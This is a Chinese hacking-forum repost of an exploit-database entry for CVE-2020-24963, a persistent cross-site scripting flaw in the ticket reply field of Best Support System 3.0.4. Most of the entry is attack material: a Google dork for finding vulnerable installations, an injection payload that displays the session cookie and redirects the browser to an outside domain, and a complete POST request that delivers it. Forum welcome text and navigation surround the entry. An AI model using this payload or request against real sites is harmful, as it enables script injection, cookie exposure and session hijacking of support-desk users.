Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated) - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月3日3年前

# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
# Google Dork: "Powered By Best Support System"
# Date: 2020-08-23
# Exploit Author: Ex.Mi [ https://ex-mi.ru ]
# Vendor: Appsbd [ https://appsbd.com ]
# Software Version: 3.0.4
# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
# Tested on: Kali Linux
# CVE: CVE-2020-24963
# CWE: CWE-79


[i] :: Info:

An Authenticated Persistent XSS vulnerability was discovered in the
Best Support System, tested version — v3.0.4.


[$] :: Payloads:

13"-->">'` -- `<!--<img src="--><img src=x
onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>


[!] :: PoC (Burp Suite POST request):

POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 350
Origin: https://localhost
Connection: close
Referer: https://localhost/support-system/ticket/details/11.html
Cookie: [cookies_here]

app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索